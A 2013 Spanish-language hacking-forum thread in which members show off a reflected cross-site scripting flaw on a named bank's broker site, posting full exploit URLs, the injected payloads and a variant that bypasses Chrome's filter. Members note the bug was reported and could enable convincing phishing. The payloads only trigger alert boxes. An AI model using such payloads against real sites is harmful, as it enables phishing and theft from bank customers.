Sólo texto | Texto con Imágenes

Underc0de

[In]Seguridad Informática => Bugs y Exploits => Hacking ShowOff => Mensaje iniciado por: Pr0ph3t en Junio 06, 2013, 06:48:38 PM

Título: XSS en Bankia
Publicado por: Pr0ph3t en Junio 06, 2013, 06:48:38 PM
URL: https://broker.bankia.es
PATH: https://broker.bankia.es/CMB/comunes/cruce_cmb/0,0,45009&ric=-FTEU1,00.html?idPagina=%22%3E%3Cimg%20src=x%20onerror=prompt%28/Prophet/%29;%3E45009&ric=-FTEU1
Vector: "><img src=x onerror=prompt(/Prophet/);>
Imagen: http://i.snag.gy/J10Lc.jpg

(http://i.snag.gy/J10Lc.jpg)

Reportada.
Título: Re:XSS en Bankia
Publicado por: Karcrack en Junio 06, 2013, 07:14:49 PM
Como era de esperar Chrome lo filtra
Título: Re:XSS en Bankia
Publicado por: Sanko en Junio 06, 2013, 07:20:45 PM
Chrome los filtra casi todos bro, de todas maneras eso no hace que la xss sea menos grave y menos tratandose de un banco
Título: Re:XSS en Bankia
Publicado por: Pr0ph3t en Junio 06, 2013, 07:36:10 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Como era de esperar Chrome lo filtra
Si quieres mañana hago que funcione en Chrome
Título: Re:XSS en Bankia
Publicado por: Jimeno en Junio 06, 2013, 08:39:19 PM
Ahí está funcionando en Chromium actualizado.
(http://img546.imageshack.us/img546/6508/capturadepantallade2013u.png)
http://img546.imageshack.us/img546/6508/capturadepantallade2013u.png
URL: https://broker.bankia.es/CMB/comunes/cruce_cmb/0,0,45009&ric=-FTEU1,00.html?idPagina=%22%3E%3Cimg%20src=x%20onerror=%22%3E%3Cconfirm(0);%3E;%3E45009&ric=-FTEU1

Saludos.
Título: Re:XSS en Bankia
Publicado por: Karcrack en Junio 07, 2013, 11:05:45 AM
@Jimeno: La versión de Windows lo filtra :-\

@Sanko: Sí, es gravísimo. Podrían hacer un phising de calidad. Saldría hasta el escudito que todo el mundo busca jaja
Sólo texto | Texto con Imágenes